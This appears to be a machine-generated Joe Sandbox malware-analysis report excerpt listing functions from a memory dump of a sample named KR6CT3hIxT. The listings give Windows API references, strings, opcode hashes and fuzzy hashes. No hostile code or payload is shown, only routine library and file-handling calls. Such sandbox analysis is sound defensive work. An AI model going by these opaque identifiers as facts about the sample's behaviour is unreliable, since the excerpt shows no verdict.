_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD0532
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD0538

Strings

%s: %s, xrefs: 00007FF7E1DCFC11
%ls, xrefs: 00007FF7E1DCF3AC, 00007FF7E1DCF3FF

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 2539828978-2259941744
Opcode ID: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
Instruction ID: ed0d7045d22124574eecbae13b390400b8ba0eeca29e0f5eb1a0d43530016a57
Opcode Fuzzy Hash: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
Instruction Fuzzy Hash: BBB28362A1868241EB14EB25E4563FEE311EFCA790F904337E69D43AE6EEBCD540C351

Function 00007FF7E1DF2550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DF2C12
memcpy_s.LIBCMT ref: 00007FF7E1DF35BF
memcpy_s.LIBCMT ref: 00007FF7E1DF3666

Part of subcall function 00007FF7E1DF38BC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DF38EE

memcpy_s.LIBCMT ref: 00007FF7E1DF372F

Part of subcall function 00007FF7E1DED008: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DED02D

Strings

1#QNAN, xrefs: 00007FF7E1DF37E8
1#SNAN, xrefs: 00007FF7E1DF37C9
1#IND, xrefs: 00007FF7E1DF37AA
1#INF, xrefs: 00007FF7E1DF3807

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction ID: 0fb59590822b618e40070394c90e9ecd5dbc05cf66f25e6d42e978e11d2b4b0e
Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction Fuzzy Hash: 8DB20872E081828BE725EF69D4417FDB7A1FB48388F905136DA1A57B88CF78E614CB11

Function 00007FF7E1DC1A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF7E1DC1A97
GetLongPathNameW.KERNEL32 ref: 00007FF7E1DC1AE0
GetShortPathNameW.KERNEL32 ref: 00007FF7E1DC1B21
GetShortPathNameW.KERNEL32 ref: 00007FF7E1DC1B6A

Part of subcall function 00007FF7E1DD13C4: CompareStringW.KERNEL32 ref: 00007FF7E1DD13E3

MoveFileW.KERNEL32 ref: 00007FF7E1DC1DFE
MoveFileW.KERNEL32 ref: 00007FF7E1DC1E65

Part of subcall function 00007FF7E1DC2134: CreateFileW.KERNEL32 ref: 00007FF7E1DC223C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1FE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1FE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1FED

Strings

rtmp, xrefs: 00007FF7E1DC1CF4, 00007FF7E1DC1D03

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
Instruction ID: b69671d5476cd470db6dc8b4cb1f469433a26f1ff66bbc98155676ffd1f7a8dc
Opcode Fuzzy Hash: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
Instruction Fuzzy Hash: 0BF10523B08A4291EB10EB65D4822FDA771FB953C4F900533EA4E43AA9DFBCD585C791

Function 00007FF7E1DC5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF7E1DC5BC2
GetFullPathNameW.KERNEL32 ref: 00007FF7E1DC5C0E
GetFullPathNameW.KERNEL32 ref: 00007FF7E1DC5D2B
GetFullPathNameW.KERNEL32 ref: 00007FF7E1DC5D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC5EE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC5EE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC5EEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC5EF2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
Instruction ID: af5e35d4352fd5f3c6fd3f25a17d869be68171488a3e6e88389c695cab4dafc4
Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
Instruction Fuzzy Hash: C3A1B4A2F14B5144FF00EB7998466BDA321AF45BE4B948732DE2D17BC9DEBCD081C251

Function 00007FF7E1DE3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7E1DE318C
RtlCaptureContext.KERNEL32 ref: 00007FF7E1DE31B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E1DE31D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E1DE3214
IsDebuggerPresent.KERNEL32 ref: 00007FF7E1DE3268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E1DE3289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E1DE3294

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction ID: b6685cb08f15d379a47fe606fe3fa631bb26097fa3b1ca0d4385709a560f2605
Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction Fuzzy Hash: B0315372608B8199EB64EF60E8513FD73A0FB44744F84443ADA4D87B98DF78D658C711

Function 00007FF7E1DE76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7E1DE7751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E1DE7769
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E1DE77A4
IsDebuggerPresent.KERNEL32 ref: 00007FF7E1DE77DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E1DE77E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E1DE77F2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: 48b1a0759bc3908d472441c42c0cc043f75d4e51c2c0159f1a708a4f80372e71
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: ED31A436A08F8195EB64DF25E8413AEB3A0FB88754F904136EA8D83B68DF7CC555CB11

Function 00007FF7E1DB1AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1EBB

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
Instruction ID: 38eb4f00193a23d90aabca93e0c351d71a21b35e401da1799107112ea3bb3ad5
Opcode Fuzzy Hash: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
Instruction Fuzzy Hash: 64B1EF62B14686A5EB10FB25E8427EDA361FF897D4F804232EA4E47B99DFBCD540C311

Function 00007FF7E1DEFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEFAC4

Part of subcall function 00007FF7E1DE7934: GetCurrentProcess.KERNEL32(00007FF7E1DF0CCD), ref: 00007FF7E1DE7961

Strings

*?, xrefs: 00007FF7E1DEFAEB
., xrefs: 00007FF7E1DEFEE4

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: 64b95332aa4a2cd410d792e38b9ccc15225dbeb1386c386633e805aabf1d2490
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 2B510762F24B9541EF14EF6198522FDA3A0FB48BD8B948532DE1D47B84DF7CD4428321

Function 00007FF7E1DF2080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF7E1DF210B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: 1831381f1accaff4c4eb49b751848b1fde58757a09c4469deeee1716390f947d
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: 55D10332B1828687DB34DF15E1857AAB7A1FB9C784F848135CB5E53B48CA7CEA51CB00

Function 00007FF7E1DBB6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DBBA9D), ref: 00007FF7E1DBB6E5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DBBA9D), ref: 00007FF7E1DBB719
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DBBA9D), ref: 00007FF7E1DBB743

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction ID: 33abe30a89dccf16c316186da557f85045db114616fd3d71b21316e116650f2e
Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction Fuzzy Hash: 9E01677170C74192EB10EF12B85167AE351FB89BC1F884035DA8E47B49CF7CD5548752

Function 00007FF7E1DEFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF7E1DEFEE4

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction ID: d9715864f4059c1475d314b78758e772d60721804f8a76c2f4b76521154e7592
Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction Fuzzy Hash: 37312A22F1869145E724EA3698067F9AA91EB84FE4F94C236EE6C47BC5CE7CD5018301

Function 00007FF7E1DF5AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7E1DF5D45
RaiseException.KERNEL32 ref: 00007FF7E1DF5D56

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction ID: aaa6dc7b0a0f0b0eca104ca441a1a03c08c366d0ab76a1f56f341e8439ef00a4
Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction Fuzzy Hash: 98B18EB3601B888BEB15CF2DC84636C7BA0F748B48F158932DA5D837A8CB79D562C711

Function 00007FF7E1DD8DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DD85E0: GetDC.USER32 ref: 00007FF7E1DD85EC
Part of subcall function 00007FF7E1DD85E0: GetDeviceCaps.GDI32 ref: 00007FF7E1DD85FD
Part of subcall function 00007FF7E1DD85E0: ReleaseDC.USER32 ref: 00007FF7E1DD860A

GetObjectW.GDI32 ref: 00007FF7E1DD8E48

Part of subcall function 00007FF7E1DD90B0: GetDC.USER32 ref: 00007FF7E1DD90D9
Part of subcall function 00007FF7E1DD90B0: GetObjectW.GDI32 ref: 00007FF7E1DD9107
Part of subcall function 00007FF7E1DD90B0: ReleaseDC.USER32 ref: 00007FF7E1DD91BB

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction ID: 7fb49f309724f775ad947470cb89a7e600192ffbffa723756ae60d26a4bfcbf3
Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction Fuzzy Hash: 87814832B08A1586EB20DF6AE4457ACB371FB88B88F404132DE0D57B28CF79E595C751

Function 00007FF7E1DDA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF7E1DDA315
GetNumberFormatW.KERNEL32 ref: 00007FF7E1DDA371

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction ID: 9d736518dc78623db54f57525aff2447f69f3d6975d559d81dca1aaa0d55ce39
Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction Fuzzy Hash: 6311D232A08B8595E721DF10E4123E9B360FF88B48FC44036EA8C03668DF7CE155C756

Function 00007FF7E1DC126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC24C0: CreateFileW.KERNELBASE ref: 00007FF7E1DC259B
Part of subcall function 00007FF7E1DC24C0: GetLastError.KERNEL32 ref: 00007FF7E1DC25AE
Part of subcall function 00007FF7E1DC24C0: CreateFileW.KERNEL32 ref: 00007FF7E1DC260E
Part of subcall function 00007FF7E1DC24C0: GetLastError.KERNEL32 ref: 00007FF7E1DC2617

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC15D0

Part of subcall function 00007FF7E1DC3980: MoveFileW.KERNEL32 ref: 00007FF7E1DC39BD
Part of subcall function 00007FF7E1DC3980: MoveFileW.KERNEL32 ref: 00007FF7E1DC3A34

Memory Dump Source
